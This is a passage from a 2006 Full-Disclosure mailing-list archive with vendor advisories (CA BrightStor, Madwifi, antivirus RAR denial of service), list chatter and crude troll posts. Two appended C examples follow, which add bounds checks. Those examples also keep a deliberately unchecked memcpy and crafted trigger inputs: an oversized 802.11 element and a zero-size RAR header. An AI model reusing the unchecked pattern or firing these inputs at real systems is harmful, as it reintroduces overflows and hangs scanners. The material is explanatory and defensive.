One of these permitted binaries is often java.exe. Now the problem arises that once Java is enabled any Java application can be executed on the system. This allows a malicious user to execute arbitrary Java code, like replacement shells (JSH), RDP clients (Propero Java RDP) and network port scanners. I could block java.exe but business requires that the company's Java application must still work. This lead me into this research on how to white list Java applications in a restricted Windows environment. For gory details see: http://www.iplosion.com/archives/54 So all this melts down to my question: Is there a way to tell java.exe to always use the Java Security Manager without the possibility of manipulation by the user? I would be very interested to learn your ideas. Kind regards Jan P. Monsch From Simon.Richter at hogyros.de Fri Dec 8 17:39:29 2006 From: Simon.Richter at hogyros.de (Simon Richter) Date: Fri, 08 Dec 2006 18:39:29 +0100 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Message-ID: <4579A351.1050409@hogyros.de> Hello, Thomas Holt wrote: > The purpose of this research is to understand > the ways that people become interested in computers and hacking, their > motives for hacking, and how they apply their skills in different > settings. This study will also consider individuals? conceptions of > hacking and experiences in hacker culture. [...] > I am not a law enforcement agent nor connected with any law enforcement > agency and am not looking to hear crazy stories about how you hacked > NASA. If you have, great, but I realize there is more to hacking than > simple media conceptions of the hacker as a criminal. Instead, I am > interested in understanding hacking from the hackers? point of view. It is not clear how you understand the term "hacker". 
In your opening paragraph, it basically describes someone who is interested
in "how things work" (which is close to the definition given in The New
Hacker's Dictionary), in the closing it appears to describe people engaged
in illegal activity (whom TNHD calls "crackers").

So the question is, are you researching the motivation for gaining knowledge
about technology, or are you researching the motivation for illegal activity
in a technology setting (which is not really related to knowledge gathering,
as can be seen by the vast numbers of "script kiddies" out there)?

If this is about the former, I might have a few pointers for you.

   Simon

From James.Williams at ca.com  Fri Dec  8 17:57:52 2006
From: James.Williams at ca.com (Williams, James K)
Date: Fri, 8 Dec 2006 12:57:52 -0500
Subject: [Full-disclosure] [CAID 34846]: CA BrightStor ARCserve Backup Discovery Service Buffer Overflow Vulnerability
Message-ID: <649CDCB56C88AA458EFF2CBF494B620401D65A00@USILMS12.ca.com>

Title: CAID 34846: CA BrightStor ARCserve Backup Discovery Service Buffer
Overflow Vulnerability

CA Vulnerability ID (CAID): 34846

CA Advisory Date: 2006-12-07

Discovered By: Assurent Secure Technologies (assurent.com)

Impact: Remote attacker can execute arbitrary code.

Summary: CA BrightStor ARCserve Backup contains a buffer overflow that
allows remote attackers to execute arbitrary code with local SYSTEM
privileges on Windows. This issue affects the BrightStor Backup Discovery
Service in multiple BrightStor ARCserve Backup application agents and the
Base product.

Mitigating Factors: None.

Severity: CA has given this vulnerability a High risk rating.

Affected Products:
BrightStor Products:
- BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not have this
  vulnerability; please apply r11.5 SP2)
- BrightStor ARCserve Backup r11.1
- BrightStor ARCserve Backup for Windows r11
- BrightStor Enterprise Backup 10.5
- BrightStor ARCserve Backup v9.01

CA Protection Suites r2:
- CA Server Protection Suite r2
- CA Business Protection Suite r2
- CA Business Protection Suite for Microsoft Small Business Server Standard
  Edition r2
- CA Business Protection Suite for Microsoft Small Business Server Premium
  Edition r2

Affected platforms:
Microsoft Windows

Status and Recommendation:
Customers with vulnerable versions of BrightStor ARCserve Backup products
should upgrade to the latest versions which are available for download from
http://supportconnect.ca.com.

Solution Document Reference APARs:
QO84609, QI82917, QO84611, QO84610

Determining if you are affected:
For a list of updated files, and instructions on how to verify that the
security update was fully applied, please review the Informational Solution
referenced in the appropriate Solution Document.

References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for this vulnerability:
Important Security Notice for BrightStor ARCserve Backup
http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp
Solution Document Reference APARs:
QO84609, QI82917, QO84611, QO84610
CA Security Advisor Research Blog postings:
http://www3.ca.com/blogs/posting.aspx?id=90744&pid=96149&date=2006/12
CAID: 34846
CAID Advisory links:
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34846
Discoverer: Assurent Secure Technologies
http://www.assurent.com/
CVE Reference: CVE-2006-6379
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379
OSVDB Reference: OSVDB IDs: 30775
http://osvdb.org/30775

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA Technical
Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory, please send
email to vuln at ca.com, or contact me directly.

If you discover a vulnerability in CA products, please report your findings
to vuln at ca.com, or utilize our "Submit a Vulnerability" form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, One CA Plaza. Islandia, NY 11749

Contact http://www3.ca.com/contact/
Legal Notice http://www3.ca.com/legal/
Privacy Policy http://www3.ca.com/privacy/
Copyright © 2006 CA. All rights reserved.

From researchonhackers at yahoo.com  Fri Dec  8 18:55:15 2006
From: researchonhackers at yahoo.com (Thomas Holt)
Date: Fri, 8 Dec 2006 10:55:15 -0800 (PST)
Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture
Message-ID: <20061208185515.11615.qmail@web58915.mail.re1.yahoo.com>

Sorry for any confusion. I am referring to hacker in the context of an
individual with a strong interest in technology who uses their skill in
unique or innovative ways (in essence, the definition provided by TNHD). How
did that knowledge base develop, what furthered your interests, and how do
you apply your knowledge? I am not interested in script kiddies, crackers,
and lamers who are only out to perform malicious attacks and want to brag
about their experiences without actually understanding the mechanics behind
what they have done.

I hope that clears things up, though if there is still any confusion please
let me know.

Thanks,
Tom

----- Original Message ----
From: Simon Richter
To: Thomas Holt
Cc: full-disclosure at lists.grok.org.uk
Sent: Friday, December 8, 2006 12:39:29 PM
Subject: Re: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture

Hello,

Thomas Holt wrote:
> The purpose of this research is to understand
> the ways that people become interested in computers and hacking, their
> motives for hacking, and how they apply their skills in different
> settings. This study will also consider individuals' conceptions of
> hacking and experiences in hacker culture.

[...]

> I am not a law enforcement agent nor connected with any law enforcement
> agency and am not looking to hear crazy stories about how you hacked
> NASA. If you have, great, but I realize there is more to hacking than
> simple media conceptions of the hacker as a criminal. Instead, I am
> interested in understanding hacking from the hackers' point of view.

It is not clear how you understand the term "hacker". In your opening
paragraph, it basically describes someone who is interested in "how things
work" (which is close to the definition given in The New Hacker's
Dictionary), in the closing it appears to describe people engaged in illegal
activity (whom TNHD calls "crackers").

So the question is, are you researching the motivation for gaining knowledge
about technology, or are you researching the motivation for illegal activity
in a technology setting (which is not really related to knowledge gathering,
as can be seen by the vast numbers of "script kiddies" out there)?

If this is about the former, I might have a few pointers for you.

   Simon

____________________________________________________________________________________
Do you Yahoo!?
Everyone is raving about the all-new Yahoo! Mail beta.
http://new.mail.yahoo.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/8dade820/attachment.html

From sovietnam_88 at yahoo.com  Fri Dec  8 18:54:57 2006
From: sovietnam_88 at yahoo.com (crook)
Date: Fri, 8 Dec 2006 10:54:57 -0800 (PST)
Subject: [Full-disclosure] This is serious business
Message-ID: <590917.68755.qm@web58905.mail.re1.yahoo.com>

loldongs

---------------------------------
Everyone is raving about the all-new Yahoo! Mail beta.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/27f88a14/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: mCrook.jpg
Type: image/pjpeg
Size: 46940 bytes
Desc: 549980111-mCrook.jpg
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/27f88a14/attachment.bin

From sovietnam_88 at yahoo.com  Fri Dec  8 19:08:46 2006
From: sovietnam_88 at yahoo.com (crook)
Date: Fri, 8 Dec 2006 11:08:46 -0800 (PST)
Subject: [Full-disclosure] MICHAEL CROOK COCK JPEG VULNERABILITY
Message-ID: <20061208190846.92849.qmail@web58901.mail.re1.yahoo.com>

Michael's crook

---------------------------------
Access over 1 million songs - Yahoo! Music Unlimited.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/f5f35617/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: mCrook.jpg
Type: image/pjpeg
Size: 46940 bytes
Desc: 549980111-mCrook.jpg
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061208/f5f35617/attachment.bin

From noodle.mastah at gmail.com  Fri Dec  8 19:16:01 2006
From: noodle.mastah at gmail.com (chinese soup)
Date: Fri, 8 Dec 2006 20:16:01 +0100
Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture
In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com>
References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com>
Message-ID:

Greetings! I come in peace!!!

"I am currently conducting a study of hackers
> and hacking and am seeking interested men and women who may be willing to
> participate."

- "participate"?? *raises eyebrows* men hacking women? *raises-hand* me me!

"The purpose of this research is to understand the ways that
> people become interested in computers and hacking"

- actually there is no "way". if you grow up around computers, you start to
like them and experiment with them more (applies to women as well.
*epiphany* so THAT's why I could never get to experiment with them in high
school!!!!). If you grow up in a family full of doctors, chances are, you'll
become a doctor and be quite good at it as well ("chances are", not "YOU
WILL") So I think you have the answer already. Just think on how YOU became
an Assistant Professor, and how you now have a PhD and apply it to the other
people with a different interest.

"I have obtained a Certificate of
> Confidentiality from the National Institutes of Health to further protect
> and ensure your privacy and confidentiality."

- of Health?? to ensure privacy?? something's not right. in fact, something
smells fishy!!!! (btw, fish sauce is very good with beef boiled for a
loooong time with onions. and some salt. and whatever suits your fancy)

"than simple media
> conceptions of the hacker as a criminal."

- nope that's not true now. at least it was a few years ago, but then again
that is just my opinion, and I believe the media has grown to respect the
"hackers" and have made a distinction between the "hackers" and the
Russian-mafia-chinese-mafia-whatever-mafia-releasing-0-days-and-attacking-organizations-or-those-sites-with-drive-by-downloadings-and-shit.

" hear crazy stories about how you hacked NASA.
> If you have,"

- no, but I have read some crazy-ass stories by a Tom Holt (a lot like Harry
Potter, although I prefer Harry Potter, err, i mean I prefer the story of
Harry Potter, especially all the parts with Hermione. grrrrrrrroowllll)

growling,
"swing and stretch. secrets to making great noodles"

On 12/8/06, Thomas Holt wrote:
>
> Greetings,
> My name is Tom Holt, and I am an Assistant Professor at the University of
> North Carolina at Charlotte. I am currently conducting a study of hackers
> and hacking and am seeking interested men and women who may be willing to
> participate. The purpose of this research is to understand the ways that
> people become interested in computers and hacking, their motives for
> hacking, and how they apply their skills in different settings. This study
> will also consider individuals' conceptions of hacking and experiences in
> hacker culture.
>
> To understand this phenomenon, I am seeking individuals who are willing to
> share their experiences and opinions in an interview which can be conducted
> either in person or via encrypted e-mail. Strict confidentiality will be
> maintained and your privacy ensured. I have obtained a Certificate of
> Confidentiality from the National Institutes of Health to further protect
> and ensure your privacy and confidentiality. All individuals who complete an
> interview will be paid $10 for their time, and $10 will also be paid for
> successful referrals.
>
> If you know anyone who is, or considers his/herself to be a hacker and is
> willing to be interviewed, please contact me via email at tjholt at uncc.edu,
> at researchonhackers at yahoo.com, or by phone at 704-795-9544. Again, strict
> confidentiality will be maintained and your privacy ensured.
>
> I am not a law enforcement agent nor connected with any law enforcement
> agency and am not looking to hear crazy stories about how you hacked NASA.
> If you have, great, but I realize there is more to hacking than simple media
> conceptions of the hacker as a criminal. Instead, I am interested in
> understanding hacking from the hackers' point of view. I have presented my
> research and described this project at several cons, including CarolinaCon
> 06, PhreakNIC X, and Defcons 13/14 and am hoping to hear from more
> individuals in the community.
>
>
> Please contact me if you are interested, and I look forward to hearing from
> you.
>
> Thank you,
>
> Thomas J. Holt, Ph. D.
>
>
>
> ________________________________
> Have a burning question? Go to Yahoo! Answers and get answers from real
> people who know.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

From tyoptyop at gmail.com  Fri Dec  8 19:08:48 2006
From: tyoptyop at gmail.com (Tyop?)
Date: Fri, 8 Dec 2006 20:08:48 +0100
Subject: [Full-disclosure] [Madwifi] Madwifi SIOCGIWSCAN buffer overflow // France Telecom
Message-ID: <985b1a3d0612081108k1b5631e9g49f639e2f9284d09@mail.gmail.com>

Name: Madwifi SIOCGIWSCAN buffer overflow
Vendor: http://www.madwifi.org
Release date: December, 7th 2006
CVE ID: CVE-2006-6332
Authors: Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES

1. Description

There is a buffer overflow in the madwifi Atheros driver in some functions
called by SIOCSIWSCAN ioctl. This issue is remotely exploitable because
ioctl SIOCSIWSCAN may be called automatically by some connection managers
(either directly, by using iwlib or by calling iwlist) when trying to get a
list of nearby access points.

2. Details

There is a stack buffer overflow in both the giwscan_cb() and encode_ie()
functions (ieee80211_wireless.c).

The first issue, in giwscan_cb, is related with insufficient checks on the
length in some 802.11 information elements which are controlled by the
attacker:

    memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2);

The second issue is improper boundary checks in encode_ie() where ielen is
never checked with bufsize.

    for (i = 0; i < ielen && bufsize > 2; i++)
        p += sprintf(p, "%02x", ie[i]);

A properly crafted 802.11 beacon or probe response frame will trigger the
bug when a process tries to get scanning results by calling ioctl
SIOCGIWSCAN. The information element used by the attacker can be either WPA
IE, RSN IE, WMM IE or ATH IE and will lead to a kernel stack overflow.

3. Vendor status

The vendor was notified on December, 6th 2006 and issued version 0.9.2.1 to
correct the issue.

4. Authors

Laurent BUTTI
Jerome RAZNIEWSKI
Julien TINNES

--
Tyop?

From michael.holstein at csuohio.edu  Fri Dec  8 19:57:40 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 08 Dec 2006 14:57:40 -0500
Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture
In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com>
References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com>
Message-ID: <4579C3B4.6040609@csuohio.edu>

Wouldn't the best way to do this be to find a way to get friendly with the
State's board of Probation & Parole? .. survey the folks that got caught so
they can tell you about it. Folks that haven't gotten caught are obviously
not all that bright if they chat it up about their misdeeds.

That said .. I've had some interesting discussions with the botnet kiddies
by reverse-engineering their malware and lurking in the appropriate IRC
channel (just do it from a separate dialup connection, lest you get
DDOS'ed). Usually the "why" question is answered with a variation of
"because I could.." or "boredom" or both.

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University

PS: I hate to be the one to point this out, but nothing will protect your
"confidential" research from a subpoena.

From nicolas.ruff at gmail.com  Fri Dec  8 18:24:03 2006
From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Fri, 08 Dec 2006 19:24:03 +0100
Subject: [Full-disclosure] What was the name of the web site ...
In-Reply-To: <45796948.8070604@telekom.yu>
References: <45796948.8070604@telekom.yu>
Message-ID: <4579ADC3.5010607@gmail.com>

> ... that keeps track of MS vulnerabilities, patches and the
> corresponding exploits?
>
> I know that it was mentioned earlier in this list but can not remember
> the URL right now...

elsenot.com ? Seems to be inactive til March :(

-nicolas-

From noodle.mastah at gmail.com  Fri Dec  8 17:46:58 2006
From: noodle.mastah at gmail.com (chinese soup)
Date: Fri, 8 Dec 2006 18:46:58 +0100
Subject: [Full-disclosure] Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
In-Reply-To:
References: <45766AB6.2080807@gmail.com>
Message-ID:

(waiting for the deluge of other lemmings who go:
"it works on blahblah with SPblahblah"
"confirmed on blahblah with blahblah language"
"blablah did not work for me blahblah"

can't you just find out the cause and not test EVERY version of IE that you
have? I mean, yeah, ok, so you tested it on IE7 yeah big deal. he reports it
on IE6. you know why it is "putting iexplore.exe at 100% CPU"?

It's like when a truck crashes into a car and everyone goes out and tests
the truck against their own cars:
"Hey, the truck also totally destroyed my Ford Explorer!"
"Oh, it also totalled my Toyota!".
"Nope, it had no effect on my tank"

yeah i mean i COULD test it, but i'm too busy with... ehrm... cooking. yes
cooking.

cooking,
"i like my noodles boiled, not fried. well, sometimes fried"

On 12/7/06, Andrius Paurys wrote:
> On 12/6/06, José Carlos Nieto Jarquín wrote:
> > Note:
> > I'm sorry, two of the exploits in the prior e-mail were incomplete.
> >
> > This is just another couple of proof of concept exploits for this
> > well-known browser. The third one is a lame combination of both.
> >
> > Tested under Windows XP SP2, MSIE 6.0.2900.2180
>
> Also confirmed working on Windows Server 2003 R2 (Build 3790) with
> Internet Explorer 7.0.5730.11
>
> 1st exploit was working fine putting iexplore.exe at 100% CPU. It
> complained about "IE restricting this web page from running scripts"
> (probably because of enabled Internet Explorer Enhanced Security
> Configuration), but if you click "allow this website to run this"
> (which is enabled by default if above mentioned IE ESC is not present)
> it works.
>
> 2nd and 3rd were not exactly working, (also because of IE ESC) because
> after clicking allow after several windows it was asking again, but
> should work on WinXP and IE7.
>
> --
> Andrius Paurys
> $h at MAN
>
> andrius.paurys at gmail.com
> Tel.: +37067449273
> ICQ: 279424019
> MSN: andrius.paurys at gmail.com
> http://shaman.tinkle.lt/
>
> I'm Lithuanian, what's _your_ excuse?
> A programmer sits there unfed, and nothing...
>

From labs-no-reply at idefense.com  Fri Dec  8 22:56:23 2006
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 08 Dec 2006 17:56:23 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.08.06: Multiple Vendor Antivirus RAR File Denial of Service Vulnerability
Message-ID: <4579ED97.2060809@idefense.com>

Multiple Vendor Antivirus RAR File Denial of Service Vulnerability

iDefense Security Advisory 12.08.06
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 08, 2006

I. BACKGROUND

AntiVirus products typically handle searching files for known viruses within
their scan engines. Most scan engines support searching inside of known
archive types for viruses as well. For more information refer to any of the
popular AntiVirus vendors' web sites.

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in Multiple
Vendors' Antivirus engines allows an attacker to cause the engines to
consume excessive resources.

The affected vendors' scan engines are vulnerable to a DoS attack when
scanning specially malformed RAR archives. Specifically, the malformed
archives will have the head_size and pack_size fields set to zero in the
Archive Header section. When such a file is encountered, the affected scan
engines will enter an infinite loop.

III. ANALYSIS

Successful exploitation will allow an attacker to cause the affected scan
engine to consume excessive CPU, and in some cases memory, resources. The
malicious RAR file would need to be uploaded to a server to initiate the
attack. Several common ways this could be achieved are e-mail attachments,
available network shares, FTP accounts, or Web form uploads.

The impact of the vulnerability varies slightly from vendor to vendor as
described below.

Sophos: Scanning of archives is not enabled by default and must be specified
by the user. This denial of service attack will prevent the scanner from
scanning other files on disk while it is stuck on the exploit file. The hung
process can be stopped by the user.

Trend Micro: Once attacked, the scan engine will consume 99 percent of CPU
resources and the affected computer will require a reboot to recover from
the condition. The scan engine process cannot be forced to quit, although
its thread priority can be lowered to regain some use of the system before
reboot.

IV. DETECTION

iDefense has confirmed this vulnerability exists in the following vendors'
products. This should not be considered an exhaustive list as these vendors
tend to include the scan engine in many of their products. Previous versions
are likely to be affected as well.

  * Sophos Small business edition (Windows/Linux) 4.06.1 with engine
    version 2.34.3.
  * Trend Micro PC Cillin - Internet Security 2006
  * Trend Micro Office Scan 7.3
  * Trend Micro Server Protect 5.58

V. WORKAROUND

For Sophos' scan engine, this exploit will not have any effect if the
"Enabled scanning of archives" option is not set.

iDefense is currently unaware of a workaround for this issue for the
remaining vendors' engines.

VI. VENDOR RESPONSE

Sophos has addressed this problem with new versions of their products. See
http://www.sophos.com/support/know
back
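The two missing checks the Madwifi advisory above describes (an IE copied by its own attacker-supplied length byte in giwscan_cb, and a hex-encoding loop in encode_ie whose bound was never decremented), shown as an added example in working C. This is illustrative code written for this page, not the madwifi driver's source: the 64-byte buffer size, the function names, and the three sample frame bodies are assumptions constructed for the illustration. It goes slightly beyond the advisory by also walking a whole IE list, since a crafted beacon is what delivers the oversized element.

```c
/* Added example (not madwifi code): bounded handling of 802.11 information
 * elements whose length byte is attacker-controlled, modelled on the two
 * bugs the Madwifi advisory describes.  Names, buffer size and the sample
 * frames are assumptions constructed for this illustration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IE_BUF_SIZE 64   /* assumed fixed-size stack buffer, like the driver's */

/* Constructed frame bodies (not captured traffic); each IE is [id][len][..].
 * kBenign: SSID "test" then a 6-byte vendor IE (0xdd).
 * kTruncated: a vendor IE claiming 255 payload bytes inside a 6-byte frame.
 * kOversized: a well-formed 100-byte IE, legal on the air but larger than
 * IE_BUF_SIZE, i.e. the case that overran the stack buffer. */
const uint8_t kBenign[]    = { 0x00, 0x04, 't','e','s','t',
                               0xdd, 0x06, 0x00,0x50,0xf2,0x01,0x01,0x00 };
const uint8_t kTruncated[] = { 0xdd, 0xff, 0x00,0x50,0xf2,0x01 };
const uint8_t kOversized[102] = { 0xdd, 100 };   /* remainder zero-filled */

/* Vulnerable pattern, kept only for contrast and never called on untrusted
 * input: it trusts ie[1], so up to 257 bytes land in a 64-byte buffer. */
size_t copy_ie_unchecked(uint8_t *buf, const uint8_t *ie)
{
    size_t n = (size_t)ie[1] + 2;
    memcpy(buf, ie, n);                 /* overflow whenever n > IE_BUF_SIZE */
    return n;
}

/* Hardened copy: the IE at `off` must lie entirely inside the frame AND fit
 * the destination.  Returns bytes copied, or 0 when the IE is rejected. */
size_t copy_ie_checked(uint8_t *buf, size_t bufsize,
                       const uint8_t *frame, size_t frame_len, size_t off)
{
    if (off > frame_len || frame_len - off < 2)   /* no room for id + len */
        return 0;
    size_t n = (size_t)frame[off + 1] + 2;
    if (n > frame_len - off)                      /* IE runs past the frame */
        return 0;
    if (n > bufsize)                              /* IE does not fit buf */
        return 0;
    memcpy(buf, frame + off, n);
    return n;
}

/* Walk the IE list: number of well-formed elements, or -1 if any element's
 * length byte points past the end of the frame. */
int walk_ies(const uint8_t *frame, size_t frame_len)
{
    size_t off = 0;
    int count = 0;
    while (off < frame_len) {
        if (frame_len - off < 2)
            return -1;
        size_t n = (size_t)frame[off + 1] + 2;
        if (n > frame_len - off)
            return -1;
        off += n;
        count++;
    }
    return count;
}

/* Hex-encode IE bytes into a text buffer.  The remaining room is recomputed
 * on every iteration (the advisory's loop compared a size that never
 * shrank) and the NUL terminator is reserved.  Returns IE bytes encoded. */
size_t encode_ie_checked(char *out, size_t outsize,
                         const uint8_t *ie, size_t ielen)
{
    if (outsize == 0)
        return 0;
    char *p = out;
    size_t i;
    for (i = 0; i < ielen; i++) {
        size_t remaining = outsize - (size_t)(p - out);
        if (remaining < 3)                        /* 2 hex chars + NUL */
            break;
        p += snprintf(p, remaining, "%02x", (unsigned)ie[i]);
    }
    *p = '\0';
    return i;
}

/* Demo wrappers owning their buffers so the checks can be exercised from a
 * caller that has none.  copy_demo caps bufsize at its 256-byte scratch. */
size_t copy_demo(const uint8_t *frame, size_t frame_len, size_t off, size_t bufsize)
{
    static uint8_t buf[256];
    return copy_ie_checked(buf, bufsize > sizeof buf ? sizeof buf : bufsize,
                           frame, frame_len, off);
}
size_t encode_demo(size_t outsize)
{
    static const uint8_t ie[] = { 0xde, 0xad, 0xbe, 0xef };
    char out[16];
    return encode_ie_checked(out, outsize > sizeof out ? sizeof out : outsize,
                             ie, sizeof ie);
}

int main(void)
{
    printf("benign: walk=%d vendor IE copied %zu bytes\n",
           walk_ies(kBenign, sizeof kBenign), copy_demo(kBenign, sizeof kBenign, 6, IE_BUF_SIZE));
    printf("truncated: walk=%d copy=%zu\n",
           walk_ies(kTruncated, sizeof kTruncated), copy_demo(kTruncated, sizeof kTruncated, 0, IE_BUF_SIZE));
    printf("oversized: walk=%d copy into 64=%zu copy into 128=%zu\n",
           walk_ies(kOversized, sizeof kOversized),
           copy_demo(kOversized, sizeof kOversized, 0, IE_BUF_SIZE),
           copy_demo(kOversized, sizeof kOversized, 0, 128));
    printf("encode 4 IE bytes into 8 chars: %zu encoded\n", encode_demo(8));
    return 0;
}
```

The oversized case is the one worth noticing: the frame is perfectly well-formed, so a length check against the frame alone passes it, and only the second check against the destination size keeps it off the stack.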
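The iDefense advisory above says a RAR archive whose header advertises head_size and pack_size of zero sends the affected engines into an infinite loop. The C below, added here as an example and not taken from any vendor's engine, walks RAR 2.x/3.x block headers and refuses any block that would not advance the file offset. Field offsets follow the public RAR block layout (HEAD_CRC, HEAD_TYPE, HEAD_FLAGS, HEAD_SIZE, optional 4-byte ADD_SIZE); the three archives are constructed by hand with zero CRC fields, which this walker does not verify.

```c
/* Added example (not any AV vendor's code): a RAR block-header walker that
 * cannot spin on a block with head_size == 0, the condition the iDefense
 * advisory describes.  Sample archives are constructed, CRCs unverified. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define RAR_HDR_MIN    7u        /* HEAD_CRC(2) HEAD_TYPE(1) HEAD_FLAGS(2) HEAD_SIZE(2) */
#define RAR_LONG_BLOCK 0x8000u   /* HEAD_FLAGS bit: 4-byte ADD_SIZE (pack_size) follows */
#define RAR_WALK_STUCK (-99L)    /* naive walker hit its iteration cap */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* kGood: marker block, 13-byte main header (type 0x73), 7-byte end block.
 * kZeroHead: marker block, then a main header whose HEAD_SIZE is 0 (the
 * advisory's trigger).  kFile: marker block, a 32-byte file header (0x74,
 * LONG_BLOCK) with pack_size 4, then 4 data bytes; passing sizeof kFile - 2
 * models a pack_size that promises more data than the file holds. */
const uint8_t kGood[] = {
    0x52,0x61,0x72,0x21,0x1a,0x07,0x00,                /* "Rar!\x1a\x07\x00" */
    0x00,0x00,0x73,0x00,0x00,0x0d,0x00, 0,0, 0,0,0,0,  /* main header, size 13 */
    0x00,0x00,0x7b,0x00,0x00,0x07,0x00                 /* end-of-archive block */
};
const uint8_t kZeroHead[] = {
    0x52,0x61,0x72,0x21,0x1a,0x07,0x00,
    0x00,0x00,0x73,0x00,0x00,0x00,0x00                 /* head_size == 0 */
};
const uint8_t kFile[43] = {
    0x52,0x61,0x72,0x21,0x1a,0x07,0x00,
    0x00,0x00,0x74,0x00,0x80,0x20,0x00,                /* file header, LONG, size 32 */
    0x04,0x00,0x00,0x00,                               /* pack_size 4 */
    [39] = 'd','a','t','a'                             /* packed data */
};

/* Naive walker (the hanging pattern): advances by the block's own size
 * fields, so a zero head_size re-reads the same block forever.  Capped at
 * max_iter here so it can be run safely for contrast. */
long count_blocks_naive(const uint8_t *buf, size_t len, unsigned max_iter)
{
    size_t off = 0;
    long n = 0;
    while (off <= len && len - off >= RAR_HDR_MIN) {
        if ((unsigned long)n >= max_iter)
            return RAR_WALK_STUCK;
        uint16_t flags = rd16(buf + off + 3);
        size_t adv = rd16(buf + off + 5);
        if ((flags & RAR_LONG_BLOCK) && len - off >= RAR_HDR_MIN + 4)
            adv += rd32(buf + off + 7);
        off += adv;
        n++;
    }
    return n;
}

/* Hardened walker.  Returns the block count, or a negative code:
 *  -1 header truncated; -2 head_size below the 7-byte minimum, which covers
 *  the zero case and guarantees forward progress; -3 block data runs past
 *  the end of the file (a lying pack_size). */
long count_blocks_checked(const uint8_t *buf, size_t len)
{
    size_t off = 0;
    long n = 0;
    while (off < len) {
        if (len - off < RAR_HDR_MIN)
            return -1;
        uint16_t flags = rd16(buf + off + 3);
        size_t hsize = rd16(buf + off + 5);
        if (hsize < RAR_HDR_MIN)
            return -2;                     /* would never advance: refuse */
        if (hsize > len - off)
            return -3;
        size_t adv = hsize;
        if (flags & RAR_LONG_BLOCK) {
            if (len - off < RAR_HDR_MIN + 4)
                return -1;
            uint32_t add = rd32(buf + off + 7);
            if (add > len - off - hsize)
                return -3;
            adv += add;
        }
        off += adv;
        n++;
    }
    return n;
}

int main(void)
{
    printf("good: checked=%ld naive=%ld\n",
           count_blocks_checked(kGood, sizeof kGood), count_blocks_naive(kGood, sizeof kGood, 1000));
    printf("zero head_size: checked=%ld naive=%ld (-99 = would loop forever)\n",
           count_blocks_checked(kZeroHead, sizeof kZeroHead), count_blocks_naive(kZeroHead, sizeof kZeroHead, 1000));
    printf("file block: checked=%ld, chopped=%ld\n",
           count_blocks_checked(kFile, sizeof kFile), count_blocks_checked(kFile, sizeof kFile - 2));
    return 0;
}
```

The single invariant that matters is that every iteration moves the offset forward by at least the header minimum and never past the end of the input; a scanner that enforces it cannot be parked on one block, whatever the size fields say.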